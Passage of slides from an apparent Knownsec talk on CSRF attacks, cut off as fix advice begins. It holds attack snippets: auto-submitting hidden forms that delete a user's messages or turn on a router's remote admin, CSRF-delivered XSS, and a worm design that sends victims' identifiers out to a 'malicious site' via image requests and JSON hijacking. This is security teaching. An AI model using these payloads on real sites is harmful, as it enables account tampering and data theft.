余弦web安全csrf攻擊巨人

Knownsec

TeamCSRF攻擊-蘇醒的巨人CSRF是什么Cross-SiteRequestForgery跨站請求偽造。–1、跨站點(diǎn)的請求；2、請求是偽造的。被攻擊者的瀏覽器被迫向目標(biāo)站點(diǎn)發(fā)起了偽造的請求，這個(gè)過程會(huì)帶上被攻擊者的身份驗(yàn)證標(biāo)識(shí)（session）以通過目標(biāo)站點(diǎn)的驗(yàn)證。從而借用被攻擊者在目標(biāo)站點(diǎn)上的權(quán)限進(jìn)行一系列不被期望的操作。內(nèi)容1、CSRF模型2、CSRF攻擊與基于CSRF的攻擊3、CSRF蠕蟲模型4、修補(bǔ)建議5、Q&A一、CSRF模型CSRF模型瀏覽器被攻擊者目標(biāo)站點(diǎn)惡意站點(diǎn)帶上session/cookie可信任的請求可信任的請求正常的請求偽造的請求惡意站點(diǎn)惡意站點(diǎn)=目標(biāo)站點(diǎn)，同域CSRF。惡意站點(diǎn)!=目標(biāo)站點(diǎn)，跨域CSRF。也許包含的CSRF攻擊代碼：<img

src=“http://目標(biāo)站點(diǎn)/action=delete&id=7”><formaction=“http://目標(biāo)站點(diǎn)/post.php”><input

type=“text”

style=“…”

name=“title”value=“csrf”

/><input

…</form><iframesrc=“…”>…<param

name="movie"

value="post_as3.swf"

/><embedsrc="post_as3.swf“…瀏覽器本地cookie：IE及IE內(nèi)核瀏覽器：CSRF時(shí)，阻止帶上本地cookie。FF等瀏覽器：沒這種限制。內(nèi)存cookie：即session

cookie。IE與FF等瀏覽器不會(huì)阻止這類cookie。多標(biāo)簽瀏覽器：關(guān)閉標(biāo)簽頁時(shí)，session

cookie沒被清除。其他問題：session的瀏覽器窗口繼承問題?？尚湃蔚恼埱笳５恼埱?、偽造的請求。瀏覽器、目標(biāo)站點(diǎn)沒對它們進(jìn)行區(qū)分。主要請求的類型：POST型CSRF、GET型CSRF。利用各種技術(shù)在客戶端發(fā)起有效的POST請求與GET請求。各種技術(shù)：JavaScript,

ActionScript,

HTML/CSS,XML,ASP,PHP,JSP,.NET等等。用戶驅(qū)動(dòng)下的請求：主動(dòng)的、被動(dòng)的。二、CSRF攻擊與基于CSRF的攻擊CSRF攻擊CSRF攻擊能完成這些事：刪除、修改、新增目標(biāo)站點(diǎn)上被攻擊者的數(shù)據(jù)；JSON

Hijacking等獲取被攻擊者的隱私數(shù)據(jù)；作為其它攻擊向量的輔助攻擊手法；使被攻擊者成為黑客下一步攻擊的跳板；甚至可以實(shí)現(xiàn)CSRF蠕蟲攻擊。下面是真實(shí)世界的CSRF攻擊實(shí)例……CSRF攻擊-實(shí)例1被攻擊者（下面就是余弦）登錄飯否CSRF攻擊-實(shí)例1余弦看到好友evilcos的消息：不錯(cuò)的攻擊手法：。于是好奇點(diǎn)擊去看。CSRF攻擊-實(shí)例1余弦的消息“test~”被刪了？！CSRF攻擊-實(shí)例1問題出現(xiàn)在這個(gè)惡意站點(diǎn)的文件：，代碼如下：<?php$s

=

"<form

method='post'

action='

'>";$s

=

$s."<input

type='text'

value='CI1z1FVs59Y'name='msg'style='display:none!important;display:block;width=0;height=0'

/>";$s

=

$s."<input

type='text'

value='msg.del'

name='action'style='display:none!important;display:block;width=0;height=0'

/>";$s

=

$s."</form>";$s

=

$s."<script>document.forms[0].submit();</script>";echo($s);?>CSRF攻擊-實(shí)例1其實(shí)還可以這樣：<img

src="

"

/>使用了POST與GET兩種CSRF方式刪除消息。偽造的刪除請求來自惡意站點(diǎn)。刪除請求被目標(biāo)站點(diǎn)執(zhí)行之前，目標(biāo)站點(diǎn)會(huì)檢測是否有合法的身份驗(yàn)證標(biāo)識(shí)（session/cookie）。被攻擊者肯定不希望看到這樣的結(jié)果。CSRF攻擊-實(shí)例2還可以對本地網(wǎng)絡(luò)設(shè)備進(jìn)行CSRF攻擊。CSRF攻擊-實(shí)例2FAST無線寬帶路由器的管理界面——遠(yuǎn)端WEB管理CSRF攻擊-實(shí)例2在登錄狀態(tài)，被攻擊者訪問了帶有CSRF攻擊代碼的網(wǎng)頁時(shí)，就“被迫”開啟了“遠(yuǎn)程WEB管理”功能。CSRF攻擊-實(shí)例2CSRF攻擊代碼如下：<img

src=

>使用GET方式發(fā)起的CSRF攻擊。通過社工等手法讓被攻擊者訪問惡意站點(diǎn)的CSRF文件。FAST無線寬帶路由器的WEB管理的默認(rèn)用戶名與密碼：admin。CSRF攻擊-實(shí)例3CSRF不一定需要瀏覽器：rar自解壓文件內(nèi)執(zhí)行javascript，等。rar自解壓文件如何CSRF成功？目標(biāo)站點(diǎn)存放了本地cookie。截圖……CSRF攻擊-實(shí)例3CSRF攻擊-實(shí)例3基于CSRF的攻擊基于CSRF的XSS攻擊基于CSRF的SQL注入攻擊基于CSRF的命令執(zhí)行攻擊……需要權(quán)限驗(yàn)證的漏洞可以使用基于CSRF的攻擊手法。經(jīng)常被忽略的安全問題?；贑SRF的攻擊-實(shí)例被攻擊者登錄自己的淘寶。在“編輯個(gè)人信息”處存在持久型的XSS漏洞?；贑SRF的攻擊-實(shí)例他同時(shí)訪問了。隨后發(fā)生了XSS攻擊?；贑SRF的攻擊-實(shí)例的部分代碼如下：<%s

=

"<form

method='post'

action='

'>“……s

=

s+"<input

type='text'style='display:none!important;display:block;width=0;height=0'

value='

火星"onmouseover="alert(/hi/.source)'name='_fmm.edi._0.a'/>“……s

=

s+"</form>"s

=

s+"<script>document.forms[0].submit();</script>"Response.write(s)%>三、CSRF蠕蟲模型CSRF蠕蟲模型CSRF蠕蟲數(shù)據(jù)處理中心Web2.0——具有CSRF漏洞數(shù)據(jù)獲取模塊數(shù)據(jù)發(fā)送模塊XSS服務(wù)端代理技術(shù)JSON

HijackingFlash(crossdomain.xml)POST(form/flash)GET(url)唯一標(biāo)識(shí)1、數(shù)據(jù)獲取模塊同域CSRF攻擊。同域內(nèi)獲取數(shù)據(jù)幾乎沒任何限制?？缬駽SRF攻擊。跨域獲取數(shù)據(jù)的幾種方法：

1、XSS2、服務(wù)端代理技術(shù)

3、JSON

Hijacing4、Flash

AsctionScript（crossdomain.xml）要獲取的關(guān)鍵數(shù)據(jù)是唯一標(biāo)識(shí)：唯一的、無法全部預(yù)知的用戶id、用戶昵稱、用戶email、用戶個(gè)人頁面地址等。使用XSS使用目標(biāo)站點(diǎn)上的XSS漏洞：<iframe

width=0

height=0

src=‘http://目標(biāo)站點(diǎn)/search.php?k=“><script

src=http://惡意站點(diǎn)/get.js></script>’></iframe>http://惡意站點(diǎn)/get.js的代碼是：//use

DOM

method

to

get

your

datanew

Image().

src=‘http://惡意站點(diǎn)/do.php?data=‘+yourdata;惡意站點(diǎn)的do.php文件接收唯一標(biāo)識(shí)等數(shù)據(jù)。該唯一標(biāo)識(shí)可以是url中的或是目標(biāo)站點(diǎn)url對應(yīng)的內(nèi)容中的。使用服務(wù)端代理使用服務(wù)端代理技術(shù)：

服務(wù)端的XMLHTTP，php的file_get_contents等等。無法獲取頁面內(nèi)容中的唯一標(biāo)識(shí)，只能獲取url中的唯一標(biāo)識(shí)：使用referer來獲取目標(biāo)站點(diǎn)的url。r=

Request.ServerVariables(“HTTP_REFERER”)。r可能為http://目標(biāo)站點(diǎn)/space/user/?id=2343，其中2343就是唯一標(biāo)識(shí)。使用JSON

HIJACKING使用JSON

Hijacking技術(shù)：目標(biāo)站點(diǎn)使用了JSON數(shù)據(jù)傳輸用戶私有數(shù)據(jù)。該私有數(shù)據(jù)內(nèi)包含我們需要的唯一標(biāo)識(shí)等信息。相關(guān)代碼：<script>function

hijack(o){//use

DOM

method

to

get

your

datanew

Image().src="

"+escape(data);}</script><script/private_messages/inbox.json?callback=hijack&count=2></script>使用FLASH使用Flash

ActionScript腳本：目標(biāo)站點(diǎn)下必須存在crossdomain.xml文件。crossdomain.xml中的配置允許其他域的AS腳本進(jìn)行跨域請求。<?xml

version="1.0"?><cross-domain-policy><allow-access-from

domain="*"

/></cross-domain-policy>相關(guān)代碼：import

.*;var

_l=new

URLLoader(new

URLRequest(“http://目標(biāo)站點(diǎn)/"));_l.addEventListener(Event.COMPLETE,function(){text1.text

=_l.data});_l.load();其它方法<script>標(biāo)簽的跨域性質(zhì)：目標(biāo)站點(diǎn)有些根據(jù)用戶唯一標(biāo)識(shí)生成的.js等文件。也許包含唯一標(biāo)識(shí)在這些文件中，比如var

user_id=2343;。我們可以獲取這樣的全局變量。IE8下的XDomainRequest：目標(biāo)站點(diǎn)返回的HTTP頭部中帶有

XDomainRequestAllowed=1。CSSHttpRequest：目標(biāo)站點(diǎn)返回這樣格式的數(shù)據(jù)：@importurl(about:chr:data);其實(shí)我們漏了非常重要的一點(diǎn)：我們來控制初始唯一標(biāo)識(shí)，這在飯否CSRF蠕蟲中會(huì)講到。2、數(shù)據(jù)發(fā)送模塊唯一標(biāo)識(shí)的作用。在CSRF蠕蟲數(shù)據(jù)處理中心對唯一標(biāo)識(shí)對應(yīng)的其它相關(guān)用戶發(fā)起CSRF攻擊。就是這樣的傳播方式。使用POST或GET型的CSRF發(fā)送偽造后的請求。各種技術(shù)：JavaScript,

ActionScript,

HTML/CSS,XML,ASP,PHP,JSP,.NET等等。在客戶端發(fā)送，否則帶不上session/cookie。CSRF蠕蟲模型CSRF蠕蟲數(shù)據(jù)處理中心Web2.0——具有CSRF漏洞數(shù)據(jù)獲取模塊數(shù)據(jù)發(fā)送模塊XSS服務(wù)端代理技術(shù)JSON

HijackingFlash(crossdomain.xml)POST(form/flash)GET(url)唯一標(biāo)識(shí)飯否CSRF蠕蟲看這段錄像……四、修補(bǔ)建議修補(bǔ)建議在服務(wù)端區(qū)嚴(yán)格區(qū)分好